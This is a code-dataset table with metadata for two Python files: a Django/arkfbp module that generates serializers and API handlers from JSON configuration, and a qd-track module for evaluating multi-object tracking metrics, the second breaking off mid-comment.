hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a293bc85fbe0b61da927f2d847d68ea87390d5f8 | 21,670 | py | Python | arkfbp/common/django/app/automation/flows/modeling.py | arkfbp/arkfbp-py | 2444736462e8b4f09ae1ffe56779d9f515deb39f | [
"MIT"
] | 2 | 2020-09-11T09:26:43.000Z | 2020-12-17T07:32:38.000Z | arkfbp/common/django/app/automation/flows/modeling.py | arkfbp/arkfbp-py | 2444736462e8b4f09ae1ffe56779d9f515deb39f | [
"MIT"
] | 4 | 2020-12-02T03:42:38.000Z | 2020-12-14T07:56:06.000Z | arkfbp/common/django/app/automation/flows/modeling.py | arkfbp/arkfbp-py | 2444736462e8b4f09ae1ffe56779d9f515deb39f | [
"MIT"
] | 2 | 2020-12-08T01:11:54.000Z | 2021-01-25T04:29:15.000Z | """
自动化项目,JSON Config建模相关.
"""
# pylint: disable=too-many-lines
import copy
import os
import time
from importlib import import_module
from django.db import models
from arkfbp.executer import Executer
from arkfbp.node import (CharFieldNode, IntegerFieldNode, FloatFieldNode, ListSerializerNode, AnyFieldNode,
UUIDFieldNode, BooleanFieldNode, DateTimeFieldNode, ModelSerializerNode, SerializerNode,
PaginationNode)
from arkfbp.utils.util import get_class_from_path, json_load
# ModelSerializerNode metadata
_AUTO_MODEL_SERIALIZER_NODE_NAME = 'auto_model_serializer'
_AUTO_MODEL_SERIALIZER_NODE_KIND = 'auto_model_serializer'
class AutoModelSerializerNode(ModelSerializerNode, SerializerNode):
"""
Auto Model SerializerNode
"""
name = _AUTO_MODEL_SERIALIZER_NODE_NAME
kind = _AUTO_MODEL_SERIALIZER_NODE_KIND
# pylint: disable=too-many-locals, import-outside-toplevel, no-member,
# pylint: disable=broad-except, unused-argument, too-many-branches, too-many-statements
def handle(self, api_detail, model_mapping, *args, **kwargs):
"""
handle model.
"""
# pylint: disable=line-too-long
index_value = None
for key, value in api_detail.get(CONFIG_API_INDEX, {}).items():
path = value if isinstance(value, str) else value.get(FIELD_SRC)
index = path.split('.')[-1]
index_value = kwargs.get(key, None)
break
handler = api_detail.get(API_TYPE, None)
if handler == API_TYPE_MAPPING['create']:
results = {}
for model, fields in model_mapping.items():
self.model = model
# pylint: disable=consider-using-dict-comprehension
collect_data = dict([(field[1], self.validated_data.get(field[1])) for field in fields])
results[model] = self.create(**collect_data)
response = {}
for model, instance in results.items():
struct, config = single_model_response(model, api_detail[API_RESPONSE], self.flow.config)
node = get_serializer_node(struct, config, instance=instance)
response.update(**node.data)
return response
if handler == API_TYPE_MAPPING['delete'] and index_value is not None:
for key, value in api_detail[CONFIG_API_INDEX].items():
model = search_available_model(key, value, self.flow.config)
if model:
self.model = model
break
try:
instance = self.get_object(**{index: index_value})
except Exception:
return self.flow.shutdown({'error': 'No objects exists'}, response_status=400)
self.delete(instance)
return {'delete': 'success'}
if handler == API_TYPE_MAPPING['update'] and index_value is not None:
for key, value in api_detail[API_REQUEST].items():
model = search_available_model(key, value, self.flow.config)
if model:
self.model = model
break
try:
instance = self.get_object(**{index: index_value})
except Exception:
return self.flow.shutdown({'error': 'No objects exists'}, response_status=400)
self.update(instance, **self.validated_data)
return self.data
if handler == API_TYPE_MAPPING['retrieve']:
for key, value in api_detail[API_RESPONSE].items():
model = search_available_model(key, value, self.flow.config)
if model:
self.model = model
break
pagination_config = api_detail.get('pagination')
pagination = pagination_config.get('enabled', False) if pagination_config else False
if pagination:
page_query_param = 'page'
page_size_query_param = 'page_size'
for key, detail in api_detail[API_REQUEST].items():
if detail == '.pagination.page':
page_query_param = key
if detail == '.pagination.page_size':
page_size_query_param = key
page = self.inputs.ds.pop(page_query_param, 1)
page_size = self.inputs.ds.pop(page_size_query_param, 20)
query_set = self.retrieve(**self.inputs.ds)
node = get_serializer_node(api_detail[API_RESPONSE], self.flow.config, instance=query_set)
if pagination:
count_param = pagination_config.get('count_param', 'count')
results_param = pagination_config.get('results_param', 'results')
next_param = pagination_config.get('next_param', 'next')
previous_param = pagination_config.get('previous_param', 'previous')
paginated_response = pagination_config.get('paginated_response')
if paginated_response:
paginated_response = get_class_from_path(paginated_response)
pagination_node = PaginationNode()
ret = Executer.start_node(pagination_node,
self.flow,
page_size=page_size,
page=page,
inputs=query_set,
request=self.inputs,
count_param=count_param,
results_param=results_param,
next_param=next_param,
previous_param=previous_param,
page_query_param=page_query_param,
page_size_query_param=page_size_query_param,
serializer_node=node,
paginated_response=paginated_response)
# 进行自定义重组数据结构
ret = reset_response('pagination', ret, api_detail[API_RESPONSE], self.flow.config)
return ret
return node.data
if handler == API_TYPE_MAPPING['custom']:
handler_path = api_detail['flow']
clz = import_module(f'{handler_path}.main')
flow = clz.Main()
ret = Executer.start_flow(
flow,
self.inputs,
validated_data=self.validated_data,
)
return ret
raise Exception('Invalid SerializerCore handler!')
# JSON config master fields definition
CONFIG_NAME = 'name'
CONFIG_TYPE = 'type'
CONFIG_MODULE = 'module'
CONFIG_META = 'meta'
CONFIG_API = 'api'
CONFIG_API_INDEX = 'index'
CONFIG_PERMISSION = 'permission'
# field source definition
SOURCE_MODEL = 'model'
SOURCE_META = 'meta'
SOURCE_INTERNAL = 'internal'
# field config definition
OBJECT_TYPE = 'object'
ARRAY_TYPE = 'array'
ARRAY_TYPE_ITEM = 'array_item'
FIELD_TYPE = 'type'
FIELD_TITLE = 'title'
FIELD_SRC = 'src'
FIELD_REQUIRED = 'required'
# api config definition
API_TYPE = 'type'
API_REQUEST = 'request'
API_RESPONSE = 'response'
API_PERMISSION = 'permission'
API_DEBUG = 'debug'
# extend for internal field
EXTEND_PAGINATION = 'pagination'
# role config field
ROLE_FLOW = 'flow'
# meta字段的类型
META_FIELD_MAPPING = {
'string': CharFieldNode,
'integer': IntegerFieldNode,
'float': FloatFieldNode,
'object': AutoModelSerializerNode,
'array': ListSerializerNode,
'uuid': UUIDFieldNode,
'any': AnyFieldNode,
'boolean': BooleanFieldNode,
'datetime': DateTimeFieldNode,
}
# META_FIELD_MAPPING的key与value的位置对调
REVERSE_META_FIELD_MAPPING = dict(zip(META_FIELD_MAPPING.values(), META_FIELD_MAPPING.keys()))
# 默认api处理类型
API_TYPE_MAPPING = {
'create': 'create',
'delete': 'delete',
'update': 'update',
'retrieve': 'retrieve',
'custom': 'custom'
}
# model's fields <=> field nodes
MODEL_FIELD_MAPPING = {
models.AutoField:
IntegerFieldNode,
models.BigIntegerField:
IntegerFieldNode,
models.BooleanField:
BooleanFieldNode,
models.CharField:
CharFieldNode,
models.CommaSeparatedIntegerField:
CharFieldNode,
# models.DateField: DateFieldNode,
models.DateTimeField:
DateTimeFieldNode,
# models.DecimalField: DecimalFieldNode,
# models.EmailField: EmailFieldNode,
# models.Field: ModelFieldNode,
# models.FileField: FileFieldNode,
models.FloatField:
FloatFieldNode,
# models.ImageField: ImageFieldNode,
models.IntegerField:
IntegerFieldNode,
# models.NullBooleanField: NullBooleanFieldNode,
models.PositiveIntegerField:
IntegerFieldNode,
models.PositiveSmallIntegerField:
IntegerFieldNode,
# models.SlugField: SlugFieldNode,
models.SmallIntegerField:
IntegerFieldNode,
models.TextField:
CharFieldNode,
models.UUIDField:
UUIDFieldNode,
# models.TimeField: TimeFieldNode,
# models.URLField: URLFieldNode,
# models.GenericIPAddressField: IPAddressFieldNode,
# models.FilePathField: FilePathFieldNode,
}
# config...
def get_api_config(method: str, api_config: dict) -> (str, dict):
"""
get api config from meta config by request http method.
"""
api_detail = api_config.get(method.lower())
if not api_detail:
raise Exception(f'No api config for http_method:{method}!')
if CONFIG_API_INDEX in api_config.keys():
api_detail.update(index=api_config[CONFIG_API_INDEX])
return api_detail.get(CONFIG_TYPE, API_TYPE_MAPPING['custom']), api_detail
# pylint: disable=no-else-return, protected-access, too-many-nested-blocks
def import_field_config(field_name: str, field_detail: str, config: dict) -> (str, str, dict, dict):
"""
import form local meta config or other meta config or model class.
return < 字段来源, 字段路径, 字段具体配置信息, 完整meta config >.
"""
_field_detail = {}
if isinstance(field_detail, str):
path = field_detail
if isinstance(field_detail, dict):
_field_detail = copy.deepcopy(field_detail)
path = _field_detail.pop(FIELD_SRC, field_name)
# 内部扩展的属性,不属于meta和model
if path.startswith('.'):
return SOURCE_INTERNAL, path, {}, config
# _path => ['user', 'username'] or ['username']
_path = path.split('.')
if len(_path) == 1:
# {"meta": {"user": {"title":"","type":{}}}}
# _field_name => user
# field_config => {"title":"","type":{}}
_field_name = _path[0]
field_config = config[CONFIG_META][_field_name]
return SOURCE_META, _field_name, field_config, config
else:
# {"user": {"model": "models.user.User"}}
# name => user
# detail => {"model": "models.user.User"}
for name, detail in config[CONFIG_MODULE].items():
if name == _path[0]:
_field_name = _path[1]
if SOURCE_MODEL in detail.keys():
cls = get_class_from_path(detail[SOURCE_MODEL])
for item in cls._meta.fields:
if _field_name == item.name:
field_type = MODEL_FIELD_MAPPING[item.__class__]
field_config = {
FIELD_TITLE: item.verbose_name,
FIELD_TYPE: {
REVERSE_META_FIELD_MAPPING[field_type]: {}
},
**_field_detail
}
return SOURCE_MODEL, detail[SOURCE_MODEL], field_config, config
if SOURCE_META in detail.keys():
file_path = os.getcwd()
for item in detail[SOURCE_META].split('.'):
file_path = os.path.join(file_path, item)
file_path = f'{file_path}.json'
meta_config = json_load(file_path)
return SOURCE_META, detail[SOURCE_META], meta_config[SOURCE_META][_field_name], meta_config
raise Exception({'error': f'Path:{path} Config Not Exists!'})
def get_permission(permissions: list, config: dict) -> list:
"""
get permission from api permission field.
permissions => ["admin"]
"""
permission_config = config.get(CONFIG_PERMISSION)
flows = []
for item in permissions:
meta_permission = json_load(
os.path.join(os.getcwd(), f'{"/".join(permission_config[item.split(".")[0]].split("."))}.json'))
flows.append(get_class_from_path(f'{meta_permission[item.split(".")[1]][ROLE_FLOW]}.main.Main'))
return flows
# pylint: disable=protected-access
def merge_meta(meta: dict) -> dict:
"""
merge data for api: get meta config.
"""
modules = meta.pop(CONFIG_MODULE)
_meta = {meta.pop(CONFIG_NAME): meta}
for meta_name, detail in modules.items():
if SOURCE_META in detail.keys():
# meta config
file_path = os.getcwd()
for item in detail[SOURCE_META].split('.'):
file_path = os.path.join(file_path, item)
file_path = f'{file_path}.json'
slave_meta = json_load(file_path)
module_meta = merge_meta(slave_meta)
_meta.update(**module_meta)
if SOURCE_MODEL in detail.keys():
# model config
module_model = {meta_name: {CONFIG_TYPE: "", CONFIG_META: {}, CONFIG_API: {}}}
# module_model = {"name": meta_name, "type": "", "meta": {}, "api": {}}
cls = get_class_from_path(detail[SOURCE_MODEL])
for item in cls._meta.fields:
field_type = MODEL_FIELD_MAPPING[item.__class__]
field_config = {
FIELD_TITLE: item.verbose_name,
FIELD_TYPE: {
REVERSE_META_FIELD_MAPPING[field_type]: {}
}
}
module_model[meta_name][SOURCE_META].update(**{item.name: field_config})
_meta.update(**module_model)
return _meta
# serializer...
# pylint: disable=too-many-locals
def get_serializer_node(show_fields: dict,
config: dict,
serializer_handler=AutoModelSerializerNode,
instance=None) -> object:
"""
Dynamically generate serializer node with
field node which in request_config and response.
Both of api_detail and config are not necessarily in the same file,
because of model_object field exists.
"""
cls_name = 'Serializer_%s' % str(time.time()).replace(".", "")
cls_attr = {}
for field, detail in show_fields.items():
# {"username":{"src":"user.username"}}
# field => username
# detail -> {"src":"user.username"}
source, _, field_config, meta_config = import_field_config(field, detail, config)
if source == SOURCE_INTERNAL:
continue
if source == SOURCE_META and OBJECT_TYPE in field_config[FIELD_TYPE].keys():
node = get_serializer_node(field_config[FIELD_TYPE][OBJECT_TYPE],
meta_config,
serializer_handler=AutoModelSerializerNode,
instance=instance)
cls_attr.update({field: node})
continue
if source == SOURCE_META and ARRAY_TYPE in field_config[FIELD_TYPE].keys():
child_node = get_serializer_node({'item': field_config[FIELD_TYPE][ARRAY_TYPE][ARRAY_TYPE_ITEM]},
meta_config,
instance=instance)
node = ListSerializerNode(child=child_node, instance=instance)
cls_attr.update({field: node})
continue
if source == SOURCE_MODEL:
source_name = detail.split('.')[-1] if isinstance(detail, str) else detail[FIELD_SRC].split('.')[-1]
source_name = None if source_name == field else source_name
cls_attr.update({field: get_field_node(field_config, config, source=source_name)})
continue
cls_attr.update({'show_fields': show_fields, 'config': config})
_cls = type(cls_name, (serializer_handler, ), cls_attr)
return _cls(instance=instance)
def get_field_node(field_config: dict, config: dict, source=None) -> object:
"""
get field node.
"""
required = field_config.get(FIELD_REQUIRED, False)
field_type, field_attrs = tuple(field_config[FIELD_TYPE].items())[0][0], tuple(
field_config[FIELD_TYPE].items())[0][1]
if field_type == ARRAY_TYPE:
return get_serializer_node(field_attrs, config, serializer_handler=ListSerializerNode)
if field_type == OBJECT_TYPE:
return get_serializer_node(field_attrs, config, serializer_handler=AutoModelSerializerNode)
field_cls = META_FIELD_MAPPING[field_type]
field_attrs.update(required=required)
if source:
field_attrs.update(source=source)
return field_cls(**field_attrs)
def collect_model_mapping(fields: dict, config: dict) -> dict:
"""
fields => {"username":{"src":"model_user.username"}, "password":"password"}
return: {models.User: ['username', 'password'], models.Group: ['id']}
"""
model_mapping = {}
for field, detail in fields.items():
source, source_path, _, _ = import_field_config(field, detail, config)
if source == SOURCE_MODEL:
model_field = detail.split('.')[-1] if isinstance(detail, str) else detail[FIELD_SRC].split('.')[-1]
cls = get_class_from_path(source_path)
if cls not in model_mapping.keys():
# (field, field_name) => (show_field, model_field)
model_mapping[cls] = [(field, model_field)]
continue
model_mapping[cls].append((field, model_field))
return model_mapping
def search_available_model(field_name: str, field_detail: str, config: dict):
"""
field_name => username
field_detail => user or group.user
{field_name: field_detail}
"""
source, source_path, field_config, meta_config = import_field_config(field_name, field_detail, config)
if source == SOURCE_INTERNAL:
return None
if source == SOURCE_MODEL:
model = get_class_from_path(source_path)
return model
if OBJECT_TYPE in field_config[FIELD_TYPE].keys():
for key, value in field_config[FIELD_TYPE][OBJECT_TYPE].items():
model = search_available_model(key, value, meta_config)
if model:
return model
if ARRAY_TYPE in field_config[FIELD_TYPE].keys():
for key, value in field_config[FIELD_TYPE][ARRAY_TYPE].items():
return search_available_model(ARRAY_TYPE_ITEM, value, meta_config)
return None
def set_flow_debug(flow, api_detail):
"""
set flow debug from api_detail.debug
"""
flow.debug = api_detail.get(API_DEBUG, True)
# response...
def reset_response(extend: str, response: dict, show_fields: dict, config: dict) -> dict:
"""
reset response because of `.pagination` and so on.
"""
if extend == EXTEND_PAGINATION:
# response
# {"page": 1, "page_size": 30, "count": "", "results":{}, "next": "", "previous": ""}
for key, detail in show_fields.items():
# 判断是否含有扩展的pagination字段,若存在将其加入ret中,并删除原始位置上的字段
source, _, field_config, _ = import_field_config(key, detail, config)
if source == SOURCE_INTERNAL:
pass
if source == SOURCE_META:
if OBJECT_TYPE in field_config[FIELD_TYPE]:
for field, field_detail in field_config[FIELD_TYPE][OBJECT_TYPE].items():
if isinstance(field_detail, str) and field_detail.startswith(f'.{EXTEND_PAGINATION}'):
# 进行重构
# param => count or page or next or previous or results
param = field_detail.split('.')[-1]
response['results'][key].update(**{field: response[param]})
return response['results']
return response
def single_model_response(model: object, struct: dict, config: dict) -> (dict, dict):
"""
reset response struct for single model.
"""
_struct = {}
_config = copy.deepcopy(config)
for field, detail in struct.items():
source, source_path, field_config, config = import_field_config(field, detail, config)
if source == SOURCE_MODEL and source_path.split('.')[-1] == model.__name__:
_struct.update(**{field: detail})
if source == SOURCE_META and OBJECT_TYPE in field_config[FIELD_TYPE].keys():
for key, value in field_config[FIELD_TYPE][OBJECT_TYPE].items():
_source, _source_path, _, _ = import_field_config(key, value, config)
if _source == SOURCE_MODEL:
if _source_path.split('.')[-1] != model.__name__:
del _config[SOURCE_META][source_path][FIELD_TYPE][OBJECT_TYPE][key]
else:
_struct.update(**{field: detail})
if source == SOURCE_META and ARRAY_TYPE in field_config[FIELD_TYPE].keys():
# 一般情况下,array不会出现在single_model_response中
pass
return _struct, _config
| 39.257246 | 113 | 0.602077 | 2,323 | 21,670 | 5.349548 | 0.121825 | 0.032751 | 0.028325 | 0.024141 | 0.306027 | 0.257101 | 0.211073 | 0.182747 | 0.16601 | 0.162308 | 0 | 0.002095 | 0.29497 | 21,670 | 551 | 114 | 39.328494 | 0.811297 | 0.129811 | 0 | 0.264706 | 0 | 0 | 0.049841 | 0.011154 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032086 | false | 0.005348 | 0.042781 | 0 | 0.157754 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a294d061adc4aa59a6637bf412883b313644fac9 | 12,785 | py | Python | qdtrack/core/evaluation/mot.py | monghimng/qd-track | 5a575736875a2fa170148fffd7d75725c229ef45 | [
"Apache-2.0"
] | null | null | null | qdtrack/core/evaluation/mot.py | monghimng/qd-track | 5a575736875a2fa170148fffd7d75725c229ef45 | [
"Apache-2.0"
] | null | null | null | qdtrack/core/evaluation/mot.py | monghimng/qd-track | 5a575736875a2fa170148fffd7d75725c229ef45 | [
"Apache-2.0"
] | null | null | null | import time
from collections import defaultdict
import motmetrics as mm
import numpy as np
import pandas as pd
from motmetrics.lap import linear_sum_assignment
from motmetrics.math_util import quiet_divide
# note that there is no +1
def xyxy2xywh(bbox):
return [
bbox[0],
bbox[1],
bbox[2] - bbox[0],
bbox[3] - bbox[1],
]
# 1: person, 2: vehicle, 3: bike
super_category_map = {1: 1, 2: 1, 3: 2, 4: 2, 5: 2, 6: 3, 7: 3, 8: 2}
def intersection_over_area(preds, gts):
"""Returns the intersection over the area of the predicted box."""
out = np.zeros((len(preds), len(gts)))
for i, p in enumerate(preds):
for j, g in enumerate(gts):
x1, x2 = max(p[0], g[0]), min(p[0] + p[2], g[0] + g[2])
y1, y2 = max(p[1], g[1]), min(p[1] + p[3], g[1] + g[3])
out[i][j] = max(x2 - x1, 0) * max(y2 - y1, 0) / float(p[2] * p[3])
return out
def preprocessResult(res, anns, cats_mapping, crowd_ioa_thr=0.5):
"""Preprocesses data for utils.CLEAR_MOT_M. In particular, we drop predictions that
have high iou with gt bboxes that shouldn't be counted, such as 'iscrowded'.
Returns a subset of the predictions.
"""
# pylint: disable=too-many-locals
# fast indexing
# maps image_id -> category_id -> annotations that have this category id and occurs in that img
annsByAttr = defaultdict(lambda: defaultdict(list))
for i, bbox in enumerate(anns['annotations']):
annsByAttr[bbox['image_id']][cats_mapping[bbox['category_id']]].append(
i)
dropped_gt_ids = set()
dropped_gts = []
print('Results before drop:', sum([len(i) for i in res]))
# match
for (r, img) in zip(res, anns['images']):
anns_in_frame = [
anns['annotations'][i] for v in annsByAttr[img['id']].values()
for i in v
]
gt_bboxes = [a['bbox'] for a in anns_in_frame if not a['iscrowd']]
res_bboxes = [xyxy2xywh(v['bbox'][:-1]) for v in r.values()]
res_ids = list(r.keys())
dropped_pred = []
# drop preds that match with ignored labels
dist = mm.distances.iou_matrix(gt_bboxes, res_bboxes, max_iou=0.5)
le, ri = linear_sum_assignment(dist)
ignore_gt = [
a.get('ignore', False) for a in anns_in_frame if not a['iscrowd']
]
fp_ids = set(res_ids)
for i, j in zip(le, ri):
if not np.isfinite(dist[i, j]):
continue
fp_ids.remove(res_ids[j])
if ignore_gt[i]:
# remove from results
dropped_gt_ids.add(anns_in_frame[i]['id'])
dropped_pred.append(res_ids[j])
dropped_gts.append(i)
# drop fps that fall in crowd regions
crowd_gt_labels = [a['bbox'] for a in anns_in_frame if a['iscrowd']]
if len(crowd_gt_labels) > 0 and len(fp_ids) > 0:
ioas = np.max(
intersection_over_area(
[xyxy2xywh(r[k]['bbox'][:-1]) for k in fp_ids],
crowd_gt_labels),
axis=1)
for i, ioa in zip(fp_ids, ioas):
if ioa > crowd_ioa_thr:
dropped_pred.append(i)
for p in dropped_pred:
del r[p]
print('Results after drop:', sum([len(i) for i in res]))
def aggregate_eval_results(summary,
metrics,
cats,
mh,
generate_overall=True,
class_average=False):
if generate_overall and not class_average:
cats.append('OVERALL')
new_summary = pd.DataFrame(columns=metrics)
for cat in cats:
s = summary[summary.index.str.startswith(
str(cat))] if cat != 'OVERALL' else summary
res_sum = s.sum()
new_res = []
for metric in metrics:
if metric == 'mota':
res = 1. - quiet_divide(
res_sum['num_misses'] + res_sum['num_switches'] +
res_sum['num_false_positives'], res_sum['num_objects'])
elif metric == 'motp':
res = quiet_divide((s['motp'] * s['num_detections']).sum(),
res_sum['num_detections'])
elif metric == 'idf1':
res = quiet_divide(
2 * res_sum['idtp'],
res_sum['num_objects'] + res_sum['num_predictions'])
else:
res = res_sum[metric]
new_res.append(res)
new_summary.loc[cat] = new_res
new_summary['motp'] = (1 - new_summary['motp']) * 100
if generate_overall and class_average:
new_res = []
res_average = new_summary.fillna(0).mean()
res_sum = new_summary.sum()
for metric in metrics:
if metric in ['mota', 'motp', 'idf1']:
new_res.append(res_average[metric])
else:
new_res.append(res_sum[metric])
new_summary.loc['OVERALL'] = new_res
dtypes = [
'float' if m in ['mota', 'motp', 'idf1'] else 'int' for m in metrics
]
dtypes = {m: d for m, d in zip(metrics, dtypes)}
new_summary = new_summary.astype(dtypes)
strsummary = mm.io.render_summary(
new_summary,
formatters=mh.formatters,
namemap={
'mostly_tracked': 'MT',
'mostly_lost': 'ML',
'num_false_positives': 'FP',
'num_misses': 'FN',
'num_switches': 'IDs',
'mota': 'MOTA',
'motp': 'MOTP',
'idf1': 'IDF1'
})
print(strsummary)
return new_summary
def eval_mot(anns, all_results, split_camera=False, class_average=False, ann_path=None):
print('Evaluating BDD Results...')
assert len(all_results) == len(anns['images'])
t = time.time()
cats_mapping = {k['id']: k['id'] for k in anns['categories']}
############################## filtering predictions and gts that should be ignored
preprocessResult(all_results, anns, cats_mapping)
anns['annotations'] = [
a for a in anns['annotations']
if not (a['iscrowd'] or a.get('ignore', False))
]
# only run if have predicting something, since the tao eval code breaks otherwise
# import pdb;pdb.set_trace()
if all_results:
tao_results = tao_evaluation(ann_path, anns, all_results)
results = {}
for k, v in tao_results.items():
k = [str(token) for token in k]
k = ''.join(k)
results[f'tao_val_{k}'] = v
return results
else:
return {}
# # fast indexing
# # maps image_id -> category_id -> annotations that have this category id and occurs in that img
# annsByAttr = defaultdict(lambda: defaultdict(list))
# for i, bbox in enumerate(anns['annotations']):
# annsByAttr[bbox['image_id']][cats_mapping[bbox['category_id']]].append(
# i)
#
# track_acc = defaultdict(lambda: defaultdict())
# global_instance_id = 0
# num_instances = 0
# cat_ids = np.unique(list(cats_mapping.values()))
# video_camera_mapping = dict()
# for cat_id in cat_ids:
# for video in anns['videos']:
# track_acc[cat_id][video['id']] = mm.MOTAccumulator(auto_id=True)
# if split_camera:
# video_camera_mapping[video['id']] = video['camera_id']
#
# for img, results in zip(anns['images'], all_results):
# img_id = img['id']
#
# if img['frame_id'] == 0:
# global_instance_id += num_instances
# if len(list(results.keys())) > 0:
# num_instances = max([int(k) for k in results.keys()]) + 1
#
# pred_bboxes, pred_ids = defaultdict(list), defaultdict(list)
# for instance_id, result in results.items():
# _bbox = xyxy2xywh(result['bbox'])
# _cat = cats_mapping[result['label'] + 1]
# pred_bboxes[_cat].append(_bbox)
# instance_id = int(instance_id) + global_instance_id
# pred_ids[_cat].append(instance_id)
#
# gt_bboxes, gt_ids = defaultdict(list), defaultdict(list)
# for cat_id in cat_ids:
# for i in annsByAttr[img_id][cat_id]:
# ann = anns['annotations'][i]
# gt_bboxes[cat_id].append(ann['bbox'])
# gt_ids[cat_id].append(ann['instance_id'])
# distances = mm.distances.iou_matrix(
# gt_bboxes[cat_id], pred_bboxes[cat_id], max_iou=0.5)
# track_acc[cat_id][img['video_id']].update(gt_ids[cat_id],
# pred_ids[cat_id],
# distances)
#
# # eval for track
# print('Generating matchings and summary...')
# empty_cat = []
# for cat, video_track_acc in track_acc.items():
# for vid, v in video_track_acc.items():
# if len(v._events) == 0:
# empty_cat.append([cat, vid])
# for cat, vid in empty_cat:
# track_acc[cat].pop(vid)
#
# names, acc = [], []
# for cat, video_track_acc in track_acc.items():
# for vid, v in video_track_acc.items():
# name = '{}_{}'.format(cat, vid)
# if split_camera:
# name += '_{}'.format(video_camera_mapping[vid])
# names.append(name)
# acc.append(v)
#
# metrics = [
# 'mota', 'motp', 'num_misses', 'num_false_positives', 'num_switches',
# 'mostly_tracked', 'mostly_lost', 'idf1'
# ]
#
# print('Evaluating box tracking...')
# mh = mm.metrics.create()
# summary = mh.compute_many(
# acc,
# metrics=[
# 'num_objects', 'motp', 'num_detections', 'num_misses',
# 'num_false_positives', 'num_switches', 'mostly_tracked',
# 'mostly_lost', 'idtp', 'num_predictions'
# ],
# names=names,
# generate_overall=False)
# if split_camera:
# summary['camera_id'] = summary.index.str.split('_').str[-1]
# for camera_id, summary_ in summary.groupby('camera_id'):
